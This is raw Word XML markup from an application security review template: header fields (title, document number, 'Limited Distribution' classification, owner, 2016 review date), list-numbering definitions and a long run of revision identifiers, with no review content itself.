    <w:tblPr>
      <w:tblW w:w="99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43"/>
      <w:gridCol w:w="3802"/>
    </w:tblGrid>
    <w:tr w:rsidR="002B7238" w14:paraId="102058AD" w14:textId="77777777" w:rsidTr="005F1B0D">
      <w:trPr>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6143" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="6EEB46BB" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="0071004A" w:rsidRDefault="002B7238" w:rsidP="003E4A82">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="4320"/>
              <w:tab w:val="clear" w:pos="8640"/>
              <w:tab w:val="left" w:pos="706"/>
            </w:tabs>
            <w:ind w:left="720" w:hanging="720"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="0071004A">
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>Title</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>:</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidRPr="0015301C">
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>Application Security Review (ASR)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve"> Template</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3802" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="53055F28" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="0071004A" w:rsidRDefault="002B7238" w:rsidP="00AC33FB">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve">Document No. </w:t>
          </w:r>
          <w:r w:rsidRPr="005F1B0D">
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>IS-ASP-ANC-</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>100</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="002B7238" w14:paraId="3AC2F528" w14:textId="77777777" w:rsidTr="005F1B0D">
      <w:trPr>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6143" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="43F6A1D7" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="0071004A" w:rsidRDefault="002B7238" w:rsidP="0015301C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="4320"/>
              <w:tab w:val="clear" w:pos="8640"/>
              <w:tab w:val="left" w:pos="1598"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002A0822">
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>Classification:</w:t>
          </w:r>
          <w:r w:rsidRPr="002A0822">
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve"> Limited Distribution</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3802" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="67AB8966" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="0071004A" w:rsidRDefault="002B7238" w:rsidP="003E4A82">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>Version No. 1.0</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="002B7238" w14:paraId="66A91EF6" w14:textId="77777777" w:rsidTr="005F1B0D">
      <w:trPr>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6143" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="6443D6F8" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="0071004A" w:rsidRDefault="002B7238" w:rsidP="005F1B0D">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="4320"/>
              <w:tab w:val="clear" w:pos="8640"/>
              <w:tab w:val="left" w:pos="1598"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002A0822">
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>Owner:</w:t>
          </w:r>
          <w:r w:rsidRPr="002A0822">
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>Director, Application Security</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3802" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="199AE753" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="0071004A" w:rsidRDefault="002B7238" w:rsidP="003E4A82">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>Last Review/</w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>Appr</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>: 09/13/2016</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="0115ABF9" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="0071004A" w:rsidRDefault="002B7238">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723E581A"/>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254C34F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71CAEB0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58727F2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934881"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0FCF16C"/>
    <w:lvl w:ilvl="0" w:tplc="5E2C242E">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61D73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1466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B4DA8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49F6EFDC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="StyleHeading1"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="432"/>
        </w:tabs>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="StyleHeading2"/>
      <w:lvlText w:val="3.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="792"/>
        </w:tabs>
        <w:ind w:left="792" w:hanging="792"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="StyleHeading3"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1170"/>
        </w:tabs>
        <w:ind w:left="810" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="BodyText"/>
      <w:isLg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B183FA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="377CF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B0C35"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF80E9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B337D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12743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B447E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="953C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D4146B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="716E1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5914B6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB8A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17696A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAEC9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247699"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EC8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1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="15">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61"/>
    <w:rsid w:val="00001CD8"/>
    <w:rsid w:val="000148E3"/>
    <w:rsid w:val="00016661"/>
    <w:rsid w:val="000200DB"/>
    <w:rsid w:val="000218EB"/>
    <w:rsid w:val="00021BA3"/>
    <w:rsid w:val="00032122"/>
    <w:rsid w:val="000344DD"/>
    <w:rsid w:val="00040BDF"/>
    <w:rsid w:val="000417A3"/>
    <w:rsid w:val="00042B84"/>
    <w:rsid w:val="0004302E"/>
    <w:rsid w:val="0004368C"/>
    <w:rsid w:val="000439D1"/>
    <w:rsid w:val="00046B0C"/>
    <w:rsid w:val="00056324"/>
    <w:rsid w:val="0006257A"/>
    <w:rsid w:val="00065994"/>
    <w:rsid w:val="00067349"/>
    <w:rsid w:val="000720F0"/>
    <w:rsid w:val="00074579"/>
    <w:rsid w:val="00074D54"/>
    <w:rsid w:val="00077D56"/>
    <w:rsid w:val="0008190C"/>
    <w:rsid w:val="0008275D"/>
    <w:rsid w:val="00084228"/>
    <w:rsid w:val="0008665F"/>
    <w:rsid w:val="000906B0"/>
    <w:rsid w:val="000923F7"/>
    <w:rsid w:val="00093207"/>
    <w:rsid w:val="00095D9A"/>
    <w:rsid w:val="00096D2A"/>
    <w:rsid w:val="000976CA"/>
    <w:rsid w:val="000A0BC7"/>
    <w:rsid w:val="000A1921"/>
    <w:rsid w:val="000A451A"/>
    <w:rsid w:val="000A4ED6"/>
    <w:rsid w:val="000A5DB8"/>
    <w:rsid w:val="000A6F09"/>
    <w:rsid w:val="000A79E6"/>
    <w:rsid w:val="000C0E40"/>
    <w:rsid w:val="000D2F97"/>
    <w:rsid w:val="000D457E"/>
    <w:rsid w:val="000D5C55"/>
    <w:rsid w:val="000E30BF"/>
    <w:rsid w:val="000E3A0E"/>
    <w:rsid w:val="000E4349"/>
    <w:rsid w:val="000E51B1"/>
    <w:rsid w:val="000F15D3"/>
    <w:rsid w:val="000F2D4E"/>
    <w:rsid w:val="000F7E11"/>
    <w:rsid w:val="00102ACD"/>
    <w:rsid w:val="00102EA3"/>
    <w:rsid w:val="001075C7"/>
    <w:rsid w:val="00110754"/>
    <w:rsid w:val="001110FD"/>
    <w:rsid w:val="00112D85"/>
    <w:rsid w:val="001140C9"/>
    <w:rsid w:val="001140D3"/>
    <w:rsid w:val="001153FC"/>
    <w:rsid w:val="00115B9B"/>
    <w:rsid w:val="00121A82"/>
    <w:rsid w:val="00122ECC"/>
    <w:rsid w:val="00126328"/>
    <w:rsid w:val="001270CA"/>
    <w:rsid w:val="00130097"/>
    <w:rsid w:val="001304BF"/>
    <w:rsid w:val="0013369A"/>
    <w:rsid w:val="00137498"/>
    <w:rsid w:val="00142EDF"/>
    <w:rsid w:val="0015301C"/>
    <w:rsid w:val="00153A61"/>
    <w:rsid w:val="00153B10"/>
    <w:rsid w:val="00155631"/>
    <w:rsid w:val="00155A50"/>
    <w:rsid w:val="00155BD3"/>
    <w:rsid w:val="00157362"/>
    <w:rsid w:val="001632C6"/>
    <w:rsid w:val="0016346B"/>
    <w:rsid w:val="00164572"/>
    <w:rsid w:val="001664A1"/>
    <w:rsid w:val="001668A8"/>
    <w:rsid w:val="00175EC0"/>
    <w:rsid w:val="001806FA"/>
    <w:rsid w:val="00181E1C"/>
    <w:rsid w:val="0018203D"/>
    <w:rsid w:val="00184376"/>
    <w:rsid w:val="00184593"/>
    <w:rsid w:val="00184930"/>
    <w:rsid w:val="00187B48"/>
    <w:rsid w:val="00194DF8"/>
    <w:rsid w:val="00195E10"/>
    <w:rsid w:val="0019647C"/>
    <w:rsid w:val="001A4206"/>
    <w:rsid w:val="001A5DC0"/>
    <w:rsid w:val="001A6B05"/>
    <w:rsid w:val="001B1F83"/>
    <w:rsid w:val="001B5AA5"/>
    <w:rsid w:val="001C4FC6"/>
    <w:rsid w:val="001C6C1B"/>
    <w:rsid w:val="001C7AE1"/>
    <w:rsid w:val="001D1C87"/>
    <w:rsid w:val="001D736F"/>
    <w:rsid w:val="001E0EE8"/>
    <w:rsid w:val="001E2A57"/>
    <w:rsid w:val="001E6435"/>
    <w:rsid w:val="001E6A26"/>
    <w:rsid w:val="001F38C6"/>
    <w:rsid w:val="001F52D9"/>
    <w:rsid w:val="00203F57"/>
    <w:rsid w:val="002075FC"/>
    <w:rsid w:val="0021176A"/>
    <w:rsid w:val="002136D4"/>
    <w:rsid w:val="002150B5"/>
    <w:rsid w:val="00216CE8"/>
    <w:rsid w:val="002170FB"/>
    <w:rsid w:val="00217481"/>
    <w:rsid w:val="00220CBA"/>
    <w:rsid w:val="00227D91"/>
    <w:rsid w:val="00230159"/>
    <w:rsid w:val="0023710A"/>
    <w:rsid w:val="00243D77"/>
    <w:rsid w:val="002456B7"/>
    <w:rsid w:val="00253EEE"/>
    <w:rsid w:val="00257874"/>
    <w:rsid w:val="00257DDB"/>
    <w:rsid w:val="00260ED3"/>
    <w:rsid w:val="0026278C"/>
    <w:rsid w:val="00265CD0"/>
    <w:rsid w:val="00267DB6"/>
    <w:rsid w:val="002700CD"/>
    <w:rsid w:val="002703D8"/>
    <w:rsid w:val="002720C7"/>
    <w:rsid w:val="00272D07"/>
    <w:rsid w:val="00272FCE"/>
    <w:rsid w:val="00273D73"/>
    <w:rsid w:val="002754C8"/>
    <w:rsid w:val="00275A90"/>
    <w:rsid w:val="00280358"/>
    <w:rsid w:val="002819C2"/>
    <w:rsid w:val="002947B7"/>
    <w:rsid w:val="00294C43"/>
    <w:rsid w:val="002A5F3E"/>
    <w:rsid w:val="002A7F60"/>
    <w:rsid w:val="002B2BEE"/>
    <w:rsid w:val="002B7238"/>
    <w:rsid w:val="002B7EFB"/>
    <w:rsid w:val="002C023F"/>
    <w:rsid w:val="002C167C"/>
    <w:rsid w:val="002D4B8B"/>
    <w:rsid w:val="002D500F"/>
    <w:rsid w:val="002D7B40"/>
    <w:rsid w:val="002E187B"/>
    <w:rsid w:val="002E67F3"/>
    <w:rsid w:val="002E6AAF"/>
    <w:rsid w:val="002E79FB"/>
    <w:rsid w:val="002F4DFF"/>
    <w:rsid w:val="002F5D6A"/>
    <w:rsid w:val="002F6DAA"/>
    <w:rsid w:val="00301996"/>
    <w:rsid w:val="00301B21"/>
    <w:rsid w:val="00301D52"/>
    <w:rsid w:val="00304781"/>
    <w:rsid w:val="00307FB1"/>
    <w:rsid w:val="00311340"/>
    <w:rsid w:val="00317B59"/>
    <w:rsid w:val="00325B45"/>
    <w:rsid w:val="003305F7"/>
    <w:rsid w:val="0033184A"/>
    <w:rsid w:val="00337DDC"/>
    <w:rsid w:val="00343DA9"/>
    <w:rsid w:val="0034699E"/>
    <w:rsid w:val="00346B59"/>
    <w:rsid w:val="00350646"/>
    <w:rsid w:val="003509A7"/>
    <w:rsid w:val="003510F4"/>
    <w:rsid w:val="00351FCB"/>
    <w:rsid w:val="00352202"/>
    <w:rsid w:val="00354EEC"/>
    <w:rsid w:val="00356343"/>
    <w:rsid w:val="00360401"/>
    <w:rsid w:val="00360E93"/>
    <w:rsid w:val="00361DEF"/>
    <w:rsid w:val="00364204"/>
    <w:rsid w:val="00374686"/>
    <w:rsid w:val="0037576E"/>
    <w:rsid w:val="00382AC7"/>
    <w:rsid w:val="00383B1F"/>
    <w:rsid w:val="00387916"/>
    <w:rsid w:val="00387F9E"/>
    <w:rsid w:val="00391347"/>
    <w:rsid w:val="00392FBB"/>
    <w:rsid w:val="00397EF0"/>
    <w:rsid w:val="003A1DA5"/>
    <w:rsid w:val="003A595D"/>
    <w:rsid w:val="003B1FAA"/>
    <w:rsid w:val="003B23AD"/>
    <w:rsid w:val="003B341B"/>
    <w:rsid w:val="003B5DF9"/>
    <w:rsid w:val="003C1C04"/>
    <w:rsid w:val="003C696F"/>
    <w:rsid w:val="003D15B4"/>
    <w:rsid w:val="003D71D4"/>
    <w:rsid w:val="003E4A82"/>
    <w:rsid w:val="003E619A"/>
    <w:rsid w:val="003E7236"/>
    <w:rsid w:val="003F1BE1"/>
    <w:rsid w:val="00403DDF"/>
    <w:rsid w:val="00403F4B"/>
    <w:rsid w:val="00407DE0"/>
    <w:rsid w:val="004126F2"/>
    <w:rsid w:val="004154E5"/>
    <w:rsid w:val="00417C18"/>
    <w:rsid w:val="00417EC5"/>
    <w:rsid w:val="004223A1"/>
    <w:rsid w:val="00427E28"/>
    <w:rsid w:val="00434ABF"/>
    <w:rsid w:val="00443E5F"/>
    <w:rsid w:val="00457DEE"/>
    <w:rsid w:val="0046349C"/>
    <w:rsid w:val="00463BB9"/>
    <w:rsid w:val="004641CF"/>
    <w:rsid w:val="00464727"/>
    <w:rsid w:val="00465A4B"/>
    <w:rsid w:val="00474F97"/>
    <w:rsid w:val="00477F42"/>
    <w:rsid w:val="00481E05"/>
    <w:rsid w:val="004853F5"/>
    <w:rsid w:val="00486CD5"/>
    <w:rsid w:val="0049386F"/>
    <w:rsid w:val="004A540B"/>
    <w:rsid w:val="004B23AC"/>
    <w:rsid w:val="004B3DD9"/>
    <w:rsid w:val="004B7AE8"/>
    <w:rsid w:val="004B7F55"/>
    <w:rsid w:val="004C0B57"/>
    <w:rsid w:val="004C1C7B"/>
    <w:rsid w:val="004C246C"/>
    <w:rsid w:val="004C4113"/>
    <w:rsid w:val="004C6578"/>
    <w:rsid w:val="004C734A"/>
    <w:rsid w:val="004D01E4"/>
    <w:rsid w:val="004D54E1"/>
    <w:rsid w:val="004E1777"/>
    <w:rsid w:val="004E20BE"/>
    <w:rsid w:val="004E395A"/>
    <w:rsid w:val="004E4270"/>
    <w:rsid w:val="004E4C05"/>
    <w:rsid w:val="004E5E18"/>
    <w:rsid w:val="004E682C"/>
    <w:rsid w:val="004E7134"/>
    <w:rsid w:val="004F102E"/>
    <w:rsid w:val="004F129D"/>
    <w:rsid w:val="004F71DC"/>
    <w:rsid w:val="0050169F"/>
    <w:rsid w:val="00502268"/>
    <w:rsid w:val="00506FFD"/>
    <w:rsid w:val="00511F45"/>
    <w:rsid w:val="00512575"/>
    <w:rsid w:val="005214B1"/>
    <w:rsid w:val="00521DF1"/>
    <w:rsid w:val="005279E4"/>
    <w:rsid w:val="00527D9F"/>
    <w:rsid w:val="00537932"/>
    <w:rsid w:val="00542B35"/>
    <w:rsid w:val="0054515A"/>
    <w:rsid w:val="005520E7"/>
    <w:rsid w:val="00554CA9"/>
    <w:rsid w:val="00556478"/>
    <w:rsid w:val="005565C5"/>
    <w:rsid w:val="00560D02"/>
    <w:rsid w:val="00560F8D"/>
    <w:rsid w:val="00561610"/>
    <w:rsid w:val="00563090"/>
    <w:rsid w:val="00563694"/>
    <w:rsid w:val="00564E27"/>
    <w:rsid w:val="005650DA"/>
    <w:rsid w:val="005658FE"/>
    <w:rsid w:val="00565BD9"/>
    <w:rsid w:val="005661B3"/>
    <w:rsid w:val="00566999"/>
    <w:rsid w:val="005745C7"/>
    <w:rsid w:val="00582F40"/>
    <w:rsid w:val="005831D1"/>
    <w:rsid w:val="00586F69"/>
    <w:rsid w:val="0059414A"/>
    <w:rsid w:val="005A053F"/>
    <w:rsid w:val="005A3E04"/>
    <w:rsid w:val="005A7B6D"/>
    <w:rsid w:val="005B4B8B"/>
    <w:rsid w:val="005B5D64"/>
    <w:rsid w:val="005B69DE"/>
    <w:rsid w:val="005B6E79"/>
    <w:rsid w:val="005C383B"/>
    <w:rsid w:val="005C5055"/>
    <w:rsid w:val="005C550A"/>
    <w:rsid w:val="005D2745"/>
    <w:rsid w:val="005D2EC9"/>
    <w:rsid w:val="005D4738"/>
    <w:rsid w:val="005D6A61"/>
    <w:rsid w:val="005E1F13"/>
    <w:rsid w:val="005E46BA"/>
    <w:rsid w:val="005E6486"/>
    <w:rsid w:val="005E670E"/>
    <w:rsid w:val="005F0119"/>
    <w:rsid w:val="005F01FE"/>
    <w:rsid w:val="005F1B0D"/>
    <w:rsid w:val="005F3423"/>
    <w:rsid w:val="005F4867"/>
    <w:rsid w:val="00600001"/>
    <w:rsid w:val="00604A42"/>
    <w:rsid w:val="006056E2"/>
    <w:rsid w:val="00605A87"/>
    <w:rsid w:val="006075F6"/>
    <w:rsid w:val="00615FDF"/>
    <w:rsid w:val="00616111"/>
    <w:rsid w:val="00634BD9"/>
    <w:rsid w:val="00634E4B"/>
    <w:rsid w:val="00634EC4"/>
    <w:rsid w:val="00635C08"/>
    <w:rsid w:val="006372EB"/>
    <w:rsid w:val="0063775F"/>
    <w:rsid w:val="00645325"/>
    <w:rsid w:val="00646DF5"/>
    <w:rsid w:val="00647511"/>
    <w:rsid w:val="0064770F"/>
    <w:rsid w:val="00647F51"/>
    <w:rsid w:val="006509D2"/>
    <w:rsid w:val="00650B0D"/>
    <w:rsid w:val="00650E76"/>
    <w:rsid w:val="00651E86"/>
    <w:rsid w:val="0065335E"/>
    <w:rsid w:val="006712F7"/>
    <w:rsid w:val="00671D7F"/>
    <w:rsid w:val="00672D98"/>
    <w:rsid w:val="0067330D"/>
    <w:rsid w:val="0068194A"/>
    <w:rsid w:val="0068518F"/>
    <w:rsid w:val="00686BE7"/>
    <w:rsid w:val="00687209"/>
    <w:rsid w:val="00690CAF"/>
    <w:rsid w:val="006923C3"/>
    <w:rsid w:val="00694664"/>
    <w:rsid w:val="00697B5F"/>
    <w:rsid w:val="00697DFC"/>
    <w:rsid w:val="00697FA0"/>
    <w:rsid w:val="006A09D3"/>
    <w:rsid w:val="006A2B7B"/>
    <w:rsid w:val="006B480E"/>
    <w:rsid w:val="006B4D06"/>
    <w:rsid w:val="006B7A89"/>
    <w:rsid w:val="006B7D82"/>
    <w:rsid w:val="006D7818"/>
    <w:rsid w:val="006E2226"/>
    <w:rsid w:val="006E7AED"/>
    <w:rsid w:val="006F1D98"/>
    <w:rsid w:val="006F4A7E"/>
    <w:rsid w:val="007008B0"/>
    <w:rsid w:val="00701277"/>
    <w:rsid w:val="00703942"/>
    <w:rsid w:val="00706080"/>
    <w:rsid w:val="00706E36"/>
    <w:rsid w:val="00706E5E"/>
    <w:rsid w:val="0071699B"/>
    <w:rsid w:val="007210A0"/>
    <w:rsid w:val="0072610A"/>
    <w:rsid w:val="007331A3"/>
    <w:rsid w:val="0074252C"/>
    <w:rsid w:val="00743C06"/>
    <w:rsid w:val="0074487F"/>
    <w:rsid w:val="007469DB"/>
    <w:rsid w:val="00750BDD"/>
    <w:rsid w:val="007538FF"/>
    <w:rsid w:val="00753CED"/>
    <w:rsid w:val="00754FBA"/>
    <w:rsid w:val="00760268"/>
    <w:rsid w:val="00761420"/>
    <w:rsid w:val="007622AD"/>
    <w:rsid w:val="00765F0E"/>
    <w:rsid w:val="007669A6"/>
    <w:rsid w:val="00767706"/>
    <w:rsid w:val="00772AFE"/>
    <w:rsid w:val="0078057F"/>
    <w:rsid w:val="00782884"/>
    <w:rsid w:val="007839BD"/>
    <w:rsid w:val="00783B8B"/>
    <w:rsid w:val="00783EC2"/>
    <w:rsid w:val="007842E7"/>
    <w:rsid w:val="00791D2D"/>
    <w:rsid w:val="0079345C"/>
    <w:rsid w:val="00793DD6"/>
    <w:rsid w:val="00794DA6"/>
    <w:rsid w:val="00795B4D"/>
    <w:rsid w:val="00796A6A"/>
    <w:rsid w:val="00797004"/>
    <w:rsid w:val="00797F97"/>
    <w:rsid w:val="007A1171"/>
    <w:rsid w:val="007A1D8F"/>
    <w:rsid w:val="007A244E"/>
    <w:rsid w:val="007A295C"/>
    <w:rsid w:val="007A2BDE"/>
    <w:rsid w:val="007A48EB"/>
    <w:rsid w:val="007A6FE3"/>
    <w:rsid w:val="007B53FD"/>
    <w:rsid w:val="007B6EEE"/>
    <w:rsid w:val="007C0A73"/>
    <w:rsid w:val="007C1793"/>
    <w:rsid w:val="007C3118"/>
    <w:rsid w:val="007C646B"/>
    <w:rsid w:val="007D1AC8"/>
    <w:rsid w:val="007D1F97"/>
    <w:rsid w:val="007D6402"/>
    <w:rsid w:val="007D78C1"/>
    <w:rsid w:val="007D7B42"/>
    <w:rsid w:val="007E3194"/>
    <w:rsid w:val="007F2E2F"/>
    <w:rsid w:val="007F62EB"/>
    <w:rsid w:val="007F691B"/>
    <w:rsid w:val="00801B28"/>
    <w:rsid w:val="00803C34"/>
    <w:rsid w:val="00810035"/>
    <w:rsid w:val="00814CB0"/>
    <w:rsid w:val="00815414"/>
    <w:rsid w:val="00823DFA"/>
    <w:rsid w:val="00824779"/>
    <w:rsid w:val="008312EE"/>
    <w:rsid w:val="00835873"/>
    <w:rsid w:val="00841CE5"/>
    <w:rsid w:val="00842BCD"/>
    <w:rsid w:val="0085707E"/>
    <w:rsid w:val="00861512"/>
    <w:rsid w:val="00862044"/>
    <w:rsid w:val="008625D1"/>
    <w:rsid w:val="00863854"/>
    <w:rsid w:val="0086503E"/>
    <w:rsid w:val="008657EF"/>
    <w:rsid w:val="00873F14"/>
    <w:rsid w:val="008771BF"/>
    <w:rsid w:val="00886D16"/>
    <w:rsid w:val="00887743"/>
    <w:rsid w:val="00890408"/>
    <w:rsid w:val="008919C5"/>
    <w:rsid w:val="00891F15"/>
    <w:rsid w:val="00891F84"/>
    <w:rsid w:val="008925F1"/>
    <w:rsid w:val="008978C4"/>
    <w:rsid w:val="008A1DF5"/>
    <w:rsid w:val="008A6AF2"/>
    <w:rsid w:val="008A70C6"/>
    <w:rsid w:val="008A7889"/>
